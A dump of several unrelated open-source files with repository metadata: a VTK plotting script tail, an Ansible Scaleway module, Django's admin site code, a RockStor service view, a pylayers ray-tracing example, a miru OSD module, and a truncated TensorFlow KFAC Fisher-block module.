contMapper.SetScalarRange(0.0, 1.2)
contActor = vtk.vtkActor()
contActor.SetMapper(contMapper)
# Create outline an outline of the sampled data.
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(sample.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
outlineActor.GetProperty().SetColor(0, 0, 0)
# Create the renderer, render window, and interactor.
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Set the background color to white. Associate the actors with the
# renderer.
ren.SetBackground(1, 1, 1)
ren.AddActor(contActor)
ren.AddActor(outlineActor)
# Zoom in a little bit.
ren.ResetCamera()
ren.GetActiveCamera().Zoom(1.5)
# Initialize and start the event loop.
iren.Initialize()
renWin.Render()
iren.Start()
| bsd-3-clause |
tchernomax/ansible | lib/ansible/modules/cloud/scaleway/scaleway_image_facts.py | 53 | 3563 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2018, Yanis Guenane <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: scaleway_image_facts
short_description: Gather facts about the Scaleway images available.
description:
- Gather facts about the Scaleway images available.
version_added: "2.7"
author:
- "Yanis Guenane (@Spredzy)"
- "Remy Leone (@sieben)"
extends_documentation_fragment: scaleway
options:
region:
version_added: "2.7"
description:
- Scaleway compute zone
required: true
choices:
- ams1
- EMEA-NL-EVS
- par1
- EMEA-FR-PAR1
'''
EXAMPLES = r'''
- name: Gather Scaleway images facts
scaleway_image_facts:
region: par1
'''
RETURN = r'''
---
scaleway_image_facts:
description: Response from Scaleway API
returned: success
type: complex
contains:
"scaleway_image_facts": [
{
"arch": "x86_64",
"creation_date": "2018-07-17T16:18:49.276456+00:00",
"default_bootscript": {
"architecture": "x86_64",
"bootcmdargs": "LINUX_COMMON scaleway boot=local nbd.max_part=16",
"default": false,
"dtb": "",
"id": "15fbd2f7-a0f9-412b-8502-6a44da8d98b8",
"initrd": "http://169.254.42.24/initrd/initrd-Linux-x86_64-v3.14.5.gz",
"kernel": "http://169.254.42.24/kernel/x86_64-mainline-lts-4.9-4.9.93-rev1/vmlinuz-4.9.93",
"organization": "11111111-1111-4111-8111-111111111111",
"public": true,
"title": "x86_64 mainline 4.9.93 rev1"
},
"extra_volumes": [],
"from_server": null,
"id": "00ae4a88-3252-4eda-9feb-5f6b56bf5ef0",
"modification_date": "2018-07-17T16:42:06.319315+00:00",
"name": "Debian Stretch",
"organization": "51b656e3-4865-41e8-adbc-0c45bdd780db",
"public": true,
"root_volume": {
"id": "da32dfbb-c5ff-476d-ae2d-c297dd09b7dd",
"name": "snapshot-2a7229dc-d431-4dc5-b66e-95db08b773af-2018-07-17_16:18",
"size": 25000000000,
"volume_type": "l_ssd"
},
"state": "available"
}
]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.scaleway import (
Scaleway, ScalewayException, scaleway_argument_spec, SCALEWAY_LOCATION)
class ScalewayImageFacts(Scaleway):
def __init__(self, module):
super(ScalewayImageFacts, self).__init__(module)
self.name = 'images'
region = module.params["region"]
self.module.params['api_url'] = SCALEWAY_LOCATION[region]["api_endpoint"]
def main():
argument_spec = scaleway_argument_spec()
argument_spec.update(dict(
region=dict(required=True, choices=SCALEWAY_LOCATION.keys()),
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
try:
module.exit_json(
ansible_facts={'scaleway_image_facts': ScalewayImageFacts(module).get_resources()}
)
except ScalewayException as exc:
module.fail_json(msg=exc.message)
if __name__ == '__main__':
main()
| gpl-3.0 |
dsaraujo/circulante | django/contrib/admin/sites.py | 80 | 17398 | import re
from django import http, template
from django.contrib.admin import ModelAdmin, actions
from django.contrib.admin.forms import AdminAuthenticationForm
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.contenttypes import views as contenttype_views
from django.views.decorators.csrf import csrf_protect
from django.db.models.base import ModelBase
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse
from django.shortcuts import render_to_response
from django.utils.functional import update_wrapper
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from django.views.decorators.cache import never_cache
from django.conf import settings
LOGIN_FORM_KEY = 'this_is_the_login_form'
class AlreadyRegistered(Exception):
pass
class NotRegistered(Exception):
pass
class AdminSite(object):
"""
An AdminSite object encapsulates an instance of the Django admin application, ready
to be hooked in to your URLconf. Models are registered with the AdminSite using the
register() method, and the get_urls() method can then be used to access Django view
functions that present a full admin interface for the collection of registered
models.
"""
login_form = None
index_template = None
app_index_template = None
login_template = None
logout_template = None
password_change_template = None
password_change_done_template = None
def __init__(self, name=None, app_name='admin'):
self._registry = {} # model_class class -> admin_class instance
self.root_path = None
if name is None:
self.name = 'admin'
else:
self.name = name
self.app_name = app_name
self._actions = {'delete_selected': actions.delete_selected}
self._global_actions = self._actions.copy()
def register(self, model_or_iterable, admin_class=None, **options):
"""
Registers the given model(s) with the given admin class.
The model(s) should be Model classes, not instances.
If an admin class isn't given, it will use ModelAdmin (the default
admin options). If keyword arguments are given -- e.g., list_display --
they'll be applied as options to the admin class.
If a model is already registered, this will raise AlreadyRegistered.
If a model is abstract, this will raise ImproperlyConfigured.
"""
if not admin_class:
admin_class = ModelAdmin
# Don't import the humongous validation code unless required
if admin_class and settings.DEBUG:
from django.contrib.admin.validation import validate
else:
validate = lambda model, adminclass: None
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model._meta.abstract:
raise ImproperlyConfigured('The model %s is abstract, so it '
'cannot be registered with admin.' % model.__name__)
if model in self._registry:
raise AlreadyRegistered('The model %s is already registered' % model.__name__)
# If we got **options then dynamically construct a subclass of
# admin_class with those **options.
if options:
# For reasons I don't quite understand, without a __module__
# the created class appears to "live" in the wrong place,
# which causes issues later on.
options['__module__'] = __name__
admin_class = type("%sAdmin" % model.__name__, (admin_class,), options)
# Validate (which might be a no-op)
validate(admin_class, model)
# Instantiate the admin class to save in the registry
self._registry[model] = admin_class(model, self)
def unregister(self, model_or_iterable):
"""
Unregisters the given model(s).
If a model isn't already registered, this will raise NotRegistered.
"""
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model not in self._registry:
raise NotRegistered('The model %s is not registered' % model.__name__)
del self._registry[model]
def add_action(self, action, name=None):
"""
Register an action to be available globally.
"""
name = name or action.__name__
self._actions[name] = action
self._global_actions[name] = action
def disable_action(self, name):
"""
Disable a globally-registered action. Raises KeyError for invalid names.
"""
del self._actions[name]
def get_action(self, name):
"""
Explicitally get a registered global action wheather it's enabled or
not. Raises KeyError for invalid names.
"""
return self._global_actions[name]
@property
def actions(self):
"""
Get all the enabled actions as an iterable of (name, func).
"""
return self._actions.iteritems()
def has_permission(self, request):
"""
Returns True if the given HttpRequest has permission to view
*at least one* page in the admin site.
"""
return request.user.is_active and request.user.is_staff
def check_dependencies(self):
"""
Check that all things needed to run the admin have been correctly installed.
The default implementation checks that LogEntry, ContentType and the
auth context processor are installed.
"""
from django.contrib.admin.models import LogEntry
from django.contrib.contenttypes.models import ContentType
if not LogEntry._meta.installed:
raise ImproperlyConfigured("Put 'django.contrib.admin' in your "
"INSTALLED_APPS setting in order to use the admin application.")
if not ContentType._meta.installed:
raise ImproperlyConfigured("Put 'django.contrib.contenttypes' in "
"your INSTALLED_APPS setting in order to use the admin application.")
if not ('django.contrib.auth.context_processors.auth' in settings.TEMPLATE_CONTEXT_PROCESSORS or
'django.core.context_processors.auth' in settings.TEMPLATE_CONTEXT_PROCESSORS):
raise ImproperlyConfigured("Put 'django.contrib.auth.context_processors.auth' "
"in your TEMPLATE_CONTEXT_PROCESSORS setting in order to use the admin application.")
def admin_view(self, view, cacheable=False):
"""
Decorator to create an admin view attached to this ``AdminSite``. This
wraps the view and provides permission checking by calling
``self.has_permission``.
You'll want to use this from within ``AdminSite.get_urls()``:
class MyAdminSite(AdminSite):
def get_urls(self):
from django.conf.urls.defaults import patterns, url
urls = super(MyAdminSite, self).get_urls()
urls += patterns('',
url(r'^my_view/$', self.admin_view(some_view))
)
return urls
By default, admin_views are marked non-cacheable using the
``never_cache`` decorator. If the view can be safely cached, set
cacheable=True.
"""
def inner(request, *args, **kwargs):
if not self.has_permission(request):
return self.login(request)
return view(request, *args, **kwargs)
if not cacheable:
inner = never_cache(inner)
# We add csrf_protect here so this function can be used as a utility
# function for any view, without having to repeat 'csrf_protect'.
if not getattr(view, 'csrf_exempt', False):
inner = csrf_protect(inner)
return update_wrapper(inner, view)
def get_urls(self):
from django.conf.urls.defaults import patterns, url, include
if settings.DEBUG:
self.check_dependencies()
def wrap(view, cacheable=False):
def wrapper(*args, **kwargs):
return self.admin_view(view, cacheable)(*args, **kwargs)
return update_wrapper(wrapper, view)
# Admin-site-wide views.
urlpatterns = patterns('',
url(r'^$',
wrap(self.index),
name='index'),
url(r'^logout/$',
wrap(self.logout),
name='logout'),
url(r'^password_change/$',
wrap(self.password_change, cacheable=True),
name='password_change'),
url(r'^password_change/done/$',
wrap(self.password_change_done, cacheable=True),
name='password_change_done'),
url(r'^jsi18n/$',
wrap(self.i18n_javascript, cacheable=True),
name='jsi18n'),
url(r'^r/(?P<content_type_id>[a-z\d]+)/(?P<object_id>.+)/$',
wrap(contenttype_views.shortcut)),
url(r'^(?P<app_label>\w+)/$',
wrap(self.app_index),
name='app_list')
)
# Add in each model's views.
for model, model_admin in self._registry.iteritems():
urlpatterns += patterns('',
url(r'^%s/%s/' % (model._meta.app_label, model._meta.module_name),
include(model_admin.urls))
)
return urlpatterns
@property
def urls(self):
return self.get_urls(), self.app_name, self.name
def password_change(self, request):
"""
Handles the "change password" task -- both form display and validation.
"""
from django.contrib.auth.views import password_change
if self.root_path is not None:
url = '%spassword_change/done/' % self.root_path
else:
url = reverse('admin:password_change_done', current_app=self.name)
defaults = {
'current_app': self.name,
'post_change_redirect': url
}
if self.password_change_template is not None:
defaults['template_name'] = self.password_change_template
return password_change(request, **defaults)
def password_change_done(self, request, extra_context=None):
"""
Displays the "success" page after a password change.
"""
from django.contrib.auth.views import password_change_done
defaults = {
'current_app': self.name,
'extra_context': extra_context or {},
}
if self.password_change_done_template is not None:
defaults['template_name'] = self.password_change_done_template
return password_change_done(request, **defaults)
def i18n_javascript(self, request):
"""
Displays the i18n JavaScript that the Django admin requires.
This takes into account the USE_I18N setting. If it's set to False, the
generated JavaScript will be leaner and faster.
"""
if settings.USE_I18N:
from django.views.i18n import javascript_catalog
else:
from django.views.i18n import null_javascript_catalog as javascript_catalog
return javascript_catalog(request, packages=['django.conf', 'django.contrib.admin'])
@never_cache
def logout(self, request, extra_context=None):
"""
Logs out the user for the given HttpRequest.
This should *not* assume the user is already logged in.
"""
from django.contrib.auth.views import logout
defaults = {
'current_app': self.name,
'extra_context': extra_context or {},
}
if self.logout_template is not None:
defaults['template_name'] = self.logout_template
return logout(request, **defaults)
@never_cache
def login(self, request, extra_context=None):
"""
Displays the login form for the given HttpRequest.
"""
from django.contrib.auth.views import login
context = {
'title': _('Log in'),
'root_path': self.root_path,
'app_path': request.get_full_path(),
REDIRECT_FIELD_NAME: request.get_full_path(),
}
context.update(extra_context or {})
defaults = {
'extra_context': context,
'current_app': self.name,
'authentication_form': self.login_form or AdminAuthenticationForm,
'template_name': self.login_template or 'admin/login.html',
}
return login(request, **defaults)
@never_cache
def index(self, request, extra_context=None):
"""
Displays the main admin index page, which lists all of the installed
apps that have been registered in this site.
"""
app_dict = {}
user = request.user
for model, model_admin in self._registry.items():
app_label = model._meta.app_label
has_module_perms = user.has_module_perms(app_label)
if has_module_perms:
perms = model_admin.get_model_perms(request)
# Check whether user has any perm for this module.
# If so, add the module to the model_list.
if True in perms.values():
model_dict = {
'name': capfirst(model._meta.verbose_name_plural),
'admin_url': mark_safe('%s/%s/' % (app_label, model.__name__.lower())),
'perms': perms,
}
if app_label in app_dict:
app_dict[app_label]['models'].append(model_dict)
else:
app_dict[app_label] = {
'name': app_label.title(),
'app_url': app_label + '/',
'has_module_perms': has_module_perms,
'models': [model_dict],
}
# Sort the apps alphabetically.
app_list = app_dict.values()
app_list.sort(key=lambda x: x['name'])
# Sort the models alphabetically within each app.
for app in app_list:
app['models'].sort(key=lambda x: x['name'])
context = {
'title': _('Site administration'),
'app_list': app_list,
'root_path': self.root_path,
}
context.update(extra_context or {})
context_instance = template.RequestContext(request, current_app=self.name)
return render_to_response(self.index_template or 'admin/index.html', context,
context_instance=context_instance
)
def app_index(self, request, app_label, extra_context=None):
user = request.user
has_module_perms = user.has_module_perms(app_label)
app_dict = {}
for model, model_admin in self._registry.items():
if app_label == model._meta.app_label:
if has_module_perms:
perms = model_admin.get_model_perms(request)
# Check whether user has any perm for this module.
# If so, add the module to the model_list.
if True in perms.values():
model_dict = {
'name': capfirst(model._meta.verbose_name_plural),
'admin_url': '%s/' % model.__name__.lower(),
'perms': perms,
}
if app_dict:
app_dict['models'].append(model_dict),
else:
# First time around, now that we know there's
# something to display, add in the necessary meta
# information.
app_dict = {
'name': app_label.title(),
'app_url': '',
'has_module_perms': has_module_perms,
'models': [model_dict],
}
if not app_dict:
raise http.Http404('The requested admin page does not exist.')
# Sort the models alphabetically within each app.
app_dict['models'].sort(key=lambda x: x['name'])
context = {
'title': _('%s administration') % capfirst(app_label),
'app_list': [app_dict],
'root_path': self.root_path,
}
context.update(extra_context or {})
context_instance = template.RequestContext(request, current_app=self.name)
return render_to_response(self.app_index_template or ('admin/%s/app_index.html' % app_label,
'admin/app_index.html'), context,
context_instance=context_instance
)
# This global object represents the default admin site, for the common case.
# You can instantiate AdminSite in your own code to create a custom admin site.
site = AdminSite()
| bsd-3-clause |
priyaganti/rockstor-core | src/rockstor/smart_manager/views/sm_service.py | 2 | 2032 | """
Copyright (c) 2012-2014 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from rest_framework.response import Response
from storageadmin.util import handle_exception
from system.services import superctl
from django.db import transaction
from base_service import BaseServiceDetailView
from smart_manager.models import Service
import logging
logger = logging.getLogger(__name__)
class ServiceMonitorView(BaseServiceDetailView):
@transaction.atomic
def post(self, request, command):
"""
execute a command on the service
"""
service = Service.objects.get(name='service-monitor')
if (command == 'config'):
# nothing to really configure atm. just save the model
try:
config = request.data['config']
self._save_config(service, config)
except Exception as e:
logger.exception(e)
e_msg = ('Service Monitor could not be configured. Try again')
handle_exception(Exception(e_msg), request)
else:
try:
superctl(service.name, command)
except Exception as e:
logger.exception(e)
e_msg = ('Failed to %s Service Monitor due to a system '
'error.' % command)
handle_exception(Exception(e_msg), request)
return Response()
| gpl-3.0 |
pylayers/pylayers | pylayers/antprop/examples/ex_tud2.py | 3 | 4822 | from pylayers.simul.simulem import *
from pylayers.antprop.raysc import *
from pylayers.antprop.channel import *
import pylayers.util.pyutil as pyu
import pylayers.signal.bsignal as bs
import time
# create a Simul object
def plotray(r):
plt.ion()
plt.close('all')
fig=plt.figure('Cpp')
f,a=C.Cpp.plot(fig=fig,iy=np.array(([r])))
f,a,Cn.Cpp.plot(fig=fig,iy=np.array(([r])))
a[0].legend(('Fried','new'))
fig2=plt.figure('Ctt')
f,a=C.Ctt.plot(fig=fig2,iy=np.array(([r])))
f,a,Cn.Ctt.plot(fig=fig2,iy=np.array(([r])))
a[0].legend(('Fried','new'))
Gt.info(r)
plt.show()
###################################
# Simulation creation
#
#################################
S = Simul()
# loading a layout
filestr = 'TA-Office'
S.layout(filestr+'.ini','matDB.ini','slabDB.ini')
try:
S.L.dumpr()
except:
S.L.build()
S.L.dumpw()
S.tx = RadioNode(typ='tx')
S.tx.point([1.2,1,1.4])
# TX / RX
itx=1
irx=1
S.rx = RadioNode(typ='rx')
S.rx.point([8,-1.2,1.5])
S.save()
S.run(itx,irx)
###################################
# New load function
# load pulray tud file
#
#################################
Gt=GrRayTud()
Gt.load(S.dtud[itx][irx],S.dtang[itx][irx],S.drang[itx][irx],S.slab)
a=time.time()
print 'evaluation of all rays & interactions'
Gt.eval()
b=time.time()
#print 'memory size occupied by Interaction matrix = ',Gt.I.I.nbytes/1e6,'MB'
#print 'memory size occupied by Ctilde matrix = ',Gt.Ctilde.nbytes/1e6,'MB'
print 'evaluation in ',(b-a) ,'seconds'
C=Ctilde()
C.load(pyu.getlong(S.dfield[itx][irx],pstruc['DIRTRA']))
freq=Gt.I.f
nfreq=Gt.I.nf
nray=np.array(([Gt.nray]))
Cr=np.swapaxes(Gt.Ctilde,1,0)
#Cr=Gt.Ctilde.reshape(nray, nfreq,2,2)
#Cr=np.transpose(Gt.Ctilde,(1,0,2,3))
c11 = Cr[:,:,0,0]
c12 = Cr[:,:,0,1]
c21 = Cr[:,:,1,0]
c22 = Cr[:,:,1,1]
Cn=Ctilde()
Cn.Cpp = bs.FUsignal(freq, c11)
Cn.Ctp = bs.FUsignal(freq, c12)
Cn.Cpt = bs.FUsignal(freq, c21)
Cn.Ctt = bs.FUsignal(freq, c22)
Cn.nfreq = Gt.I.nf
Cn.nray = Gt.nray
Cn.tauk=Gt.delays
r=0
plotray(r)
### RECIPROCITY TEST
#S2 = Simul()
## loading a layout
#filestr = 'defstr'
#S2.layout(filestr+'.str','matDB.ini','slabDB.ini')
#try:
# S2.L.dumpr()
#except:
# S2.L.build()
# S2.L.dumpw()
#S2.rx = RadioNode(typ='rx')
#S2.rx.point([1.2,1,1.4])
## TX / RX
#itx=1
#irx=1
#S2.tx = RadioNode(typ='tx')
#S2.tx.point([8,-1.2,1.5])
#S2.save()
#S2.run(itx,irx)
#Gt2=GrRayTud()
#Gt2.load(S2.dtud[itx][irx],S2.dtang[itx][irx],S2.drang[itx][irx],S.slab)
#a=time.time()
#print 'evaluation of all rays & interactions'
#Gt2.eval()
#b=time.time()
#print 'memory size occupied by Interaction matrix = ',Gt.I.I.nbytes/1e6,'MB'
#print 'memory size occupied by Ctilde matrix = ',Gt.Ctilde.nbytes/1e6,'MB'
#print 'evaluation in ',(b-a) ,'seconds'
#C2=Ctilde()
#C2.load(pyu.getlong(S.dfield[itx][irx],pstruc['DIRTRA']))
#freq=Gt2.I.f
#nfreq=Gt2.I.nf
#nray=np.array(([Gt2.nray]))
#Cr2=Gt2.Ctilde.reshape(nray, nfreq,2,2)
#Cr2=np.transpose(Gt2.Ctilde,(1,0,2,3))
#c11_ = Cr2[:,:,0,0]
#c12_ = Cr2[:,:,0,1]
#c21_ = Cr2[:,:,1,0]
#c22_ = Cr2[:,:,1,1]
#Cn2=Ctilde()
#Cn2.Ctt = bs.FUsignal(freq, c11_)
#Cn2.Ctp = bs.FUsignal(freq, c12_)
#Cn2.Cpt = bs.FUsignal(freq, c21_)
#Cn2.Cpp = bs.FUsignal(freq, c22_)
#Cn2.nfreq = Gt2.I.nf
#Cn2.nray = Gt2.nray
#Cn2.tauk=Gt2.delays
##plt.ion()
#plt.figure('2Cpp - Fried')
#C.Cpp.plot()
#plt.figure('2Cpp - new')
#Cn2.Cpp.plot()
#plt.figure('2Ctt - Fried')
#C.Ctt.plot()
#plt.figure('2Ctt - new')
#Cn2.Ctt.plot()
############################################################################
#plt.figure('Ctp - Fried')
#C.Ctp.plot()
#plt.figure('Ctp - new')
#C2.Ctp.plot()
#plt.figure('Cpt - Fried')
#C.Cpt.plot()
#plt.figure('Cpt - new')
#C2.Cpt.plot()
#raw_input('press any key to close figure')
#plt.close('all')
#S2 = Simul()
## loading a layout
#filestr = 'defstr'
#S2.layout(filestr+'.str','matDB.ini','slabDB.ini')
#try:
# S2.L.dumpr()
#except:
# S2.L.build()
# S2.L.dumpw()
#S2.rx = RadioNode(typ='rx')
#S2.rx.point([1.2,1,1.4])
## TX / RX
#itx=1
#irx=1
#S2.tx = RadioNode(typ='tx')
#S2.tx.point([8,-1.2,1.5])
#S2.save()
#S2.run(itx,irx)
#Gt2=GrRayTud()
#Gt2.load(S2.dtud[itx][irx],S2.dtang[itx][irx],S2.drang[itx][irx],S2.sl)
## dictionnary of length of interactions
## keys are the number of interactions.
#k=Gt2.dli.keys()
## Gt.dli is a dictionnary of dictionnary
#Gt2.dli[k[0]].keys()
#print 'evaluation of all rays & interactions'
#Gt2.eval()
#C2=Ctilde()
#C2.load(pyu.getlong(S2.dfield[itx][irx],pstruc['DIRTRA']))
#CC = Gt.Ctilde
#C=Ctilde()
#C.load(pyu.getlong(S.dfield[itx][irx],pstruc['DIRTRA']))
#Gt.I.eval()
#rt=Gt.rayTud[1]
#thetas=Gt.get_thetas()
#mat=Gt.get_mat()
#B=rt.inter[0]
#Be=B.eval()
#T=rt.inter[3]
#Te=T.eval()
| mit |
Knio/miru | miru/osd2.py | 1 | 2435 | # Copyright (c) 2008 Drew Smathers.
# See LICENSE for details
"""On screen display
"""
from UserList import UserList
from pyglet import gl
from miru import imiru
from miru import core
from zope.interface import implements
class OSD(object):
"""The OSD is a container for objects that can be rendered in 2D
to overlay the 3D sceen. To add objects:
osd = OSD(window)
osd.add_object(thingy)
The OSD object's on_resize method should be pushed on the event
stack for handling resize events:
event.push_handlers('on_resize', osd.on_resize)
"""
implements(imiru.IOSDRenderStage)
context = None
def __init__(self):
self.objects = []
self.clickable = []
self.widgets = self.clickable
def _set_2d(self, near, far):
w = self.context.window
gl.glMatrixMode(gl.GL_PROJECTION)
gl.glPushMatrix()
gl.glLoadIdentity()
gl.glOrtho(0, w.width, 0, w.height, near, far)
gl.glMatrixMode(gl.GL_MODELVIEW)
gl.glPushMatrix()
gl.glLoadIdentity()
def _unset_2d(self):
gl.glPopMatrix()
gl.glMatrixMode(gl.GL_PROJECTION)
gl.glPopMatrix()
gl.glMatrixMode(gl.GL_MODELVIEW)
def render(self):
"""Draw contained objects.
"""
if not self.objects:
return
r = 32
self._set_2d(0, r*4)
gl.glPushAttrib(gl.GL_ENABLE_BIT)
gl.glEnable(gl.GL_BLEND)
gl.glDisable(gl.GL_DEPTH_TEST)
gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
import miru.graphics
for v in self.objects:
v.draw()
#print '-- %r' % v
#print '\n'.join([ str(t) for t in miru.graphics.TextureTool.current_parameters()])
gl.glColor4f(1,1,1,1)
gl.glPopAttrib()
self._unset_2d()
def pop(self, index=-1):
obj = self.objects.pop(index)
if obj in self.clickable:
self.clickable.remove(obj)
return obj
def __iter__(self):
return iter(self.objects)
def add_object(self, obj):
self.objects.append(obj)
if isinstance(obj, core.Object) and imiru.IDraggable.providedBy(obj.drawable):
self.clickable.append(obj)
def remove_object(self, obj):
self.objects.remove(obj)
if obj in self.clickable:
self.clickable.remove(obj)
| mit |
JingJunYin/tensorflow | tensorflow/contrib/kfac/python/ops/fisher_blocks.py | 9 | 36853 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""FisherBlock definitions.
This library contains classes for estimating blocks in a model's Fisher
Information matrix. Suppose one has a model that parameterizes a posterior
distribution over 'y' given 'x' with parameters 'params', p(y | x, params). Its
Fisher Information matrix is given by,
F(params) = E[ v(x, y, params) v(x, y, params)^T ]
where,
v(x, y, params) = (d / d params) log p(y | x, params)
and the expectation is taken with respect to the data's distribution for 'x' and
the model's posterior distribution for 'y',
x ~ p(x)
y ~ p(y | x, params)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import enum # pylint: disable=g-bad-import-order
import six
from tensorflow.contrib.kfac.python.ops import fisher_factors
from tensorflow.contrib.kfac.python.ops import utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
# For blocks corresponding to convolutional layers, or any type of block where
# the parameters can be thought of as being replicated in time or space,
# we want to adjust the scale of the damping by
# damping /= num_replications ** NORMALIZE_DAMPING_POWER
NORMALIZE_DAMPING_POWER = 1.0
# Methods for adjusting damping for FisherBlocks. See
# _compute_pi_adjusted_damping() for details.
PI_OFF_NAME = "off"
PI_TRACENORM_NAME = "tracenorm"
PI_TYPE = PI_TRACENORM_NAME
def set_global_constants(normalize_damping_power=None, pi_type=None):
"""Sets various global constants used by the classes in this module."""
global NORMALIZE_DAMPING_POWER
global PI_TYPE
if normalize_damping_power is not None:
NORMALIZE_DAMPING_POWER = normalize_damping_power
if pi_type is not None:
PI_TYPE = pi_type
def _compute_pi_tracenorm(left_cov, right_cov):
"""Computes the scalar constant pi for Tikhonov regularization/damping.
pi = sqrt( (trace(A) / dim(A)) / (trace(B) / dim(B)) )
See section 6.3 of https://arxiv.org/pdf/1503.05671.pdf for details.
Args:
left_cov: The left Kronecker factor "covariance".
right_cov: The right Kronecker factor "covariance".
Returns:
The computed scalar constant pi for these Kronecker Factors (as a Tensor).
"""
# Instead of dividing by the dim of the norm, we multiply by the dim of the
# other norm. This works out the same in the ratio.
left_norm = math_ops.trace(left_cov) * right_cov.shape.as_list()[0]
right_norm = math_ops.trace(right_cov) * left_cov.shape.as_list()[0]
return math_ops.sqrt(left_norm / right_norm)
def _compute_pi_adjusted_damping(left_cov, right_cov, damping):
if PI_TYPE == PI_TRACENORM_NAME:
pi = _compute_pi_tracenorm(left_cov, right_cov)
return (damping * pi, damping / pi)
elif PI_TYPE == PI_OFF_NAME:
return (damping, damping)
@six.add_metaclass(abc.ABCMeta)
class FisherBlock(object):
"""Abstract base class for objects modeling approximate Fisher matrix blocks.
Subclasses must implement multiply_inverse(), instantiate_factors(), and
tensors_to_compute_grads() methods.
"""
def __init__(self, layer_collection):
self._layer_collection = layer_collection
@abc.abstractmethod
def instantiate_factors(self, grads_list, damping):
"""Creates and registers the component factors of this Fisher block.
Args:
grads_list: A list gradients (each a Tensor or tuple of Tensors) with
respect to the tensors returned by tensors_to_compute_grads() that
are to be used to estimate the block.
damping: The damping factor (float or Tensor).
"""
pass
@abc.abstractmethod
def multiply_inverse(self, vector):
"""Multiplies the vector by the (damped) inverse of the block.
Args:
vector: The vector (a Tensor or tuple of Tensors) to be multiplied.
Returns:
The vector left-multiplied by the (damped) inverse of the block.
"""
pass
@abc.abstractmethod
def multiply(self, vector):
"""Multiplies the vector by the (damped) block.
Args:
vector: The vector (a Tensor or tuple of Tensors) to be multiplied.
Returns:
The vector left-multiplied by the (damped) block.
"""
pass
@abc.abstractmethod
def tensors_to_compute_grads(self):
"""Returns the Tensor(s) with respect to which this FisherBlock needs grads.
"""
pass
@abc.abstractproperty
def num_registered_minibatches(self):
"""Number of minibatches registered for this FisherBlock.
Typically equal to the number of towers in a multi-tower setup.
"""
pass
class FullFB(FisherBlock):
"""FisherBlock using a full matrix estimate (no approximations).
FullFB uses a full matrix estimate (no approximations), and should only ever
be used for very low dimensional parameters.
Note that this uses the naive "square the sum estimator", and so is applicable
to any type of parameter in principle, but has very high variance.
"""
def __init__(self, layer_collection, params):
"""Creates a FullFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
params: The parameters of this layer (Tensor or tuple of Tensors).
"""
self._batch_sizes = []
self._params = params
super(FullFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
self._damping = damping
self._factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullFactor, (grads_list, self._batch_size))
self._factor.register_damped_inverse(damping)
def multiply_inverse(self, vector):
inverse = self._factor.get_damped_inverse(self._damping)
out_flat = math_ops.matmul(inverse, utils.tensors_to_column(vector))
return utils.column_to_tensors(vector, out_flat)
def multiply(self, vector):
vector_flat = utils.tensors_to_column(vector)
out_flat = (
math_ops.matmul(self._factor.get_cov(), vector_flat) +
self._damping * vector_flat)
return utils.column_to_tensors(vector, out_flat)
def full_fisher_block(self):
"""Explicitly constructs the full Fisher block."""
return self._factor.get_cov()
def tensors_to_compute_grads(self):
return self._params
def register_additional_minibatch(self, batch_size):
"""Register an additional minibatch.
Args:
batch_size: The batch size, used in the covariance estimator.
"""
self._batch_sizes.append(batch_size)
@property
def num_registered_minibatches(self):
return len(self._batch_sizes)
@property
def _batch_size(self):
return math_ops.reduce_sum(self._batch_sizes)
class NaiveDiagonalFB(FisherBlock):
"""FisherBlock using a diagonal matrix approximation.
This type of approximation is generically applicable but quite primitive.
Note that this uses the naive "square the sum estimator", and so is applicable
to any type of parameter in principle, but has very high variance.
"""
def __init__(self, layer_collection, params):
"""Creates a NaiveDiagonalFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
params: The parameters of this layer (Tensor or tuple of Tensors).
"""
self._params = params
self._batch_sizes = []
super(NaiveDiagonalFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
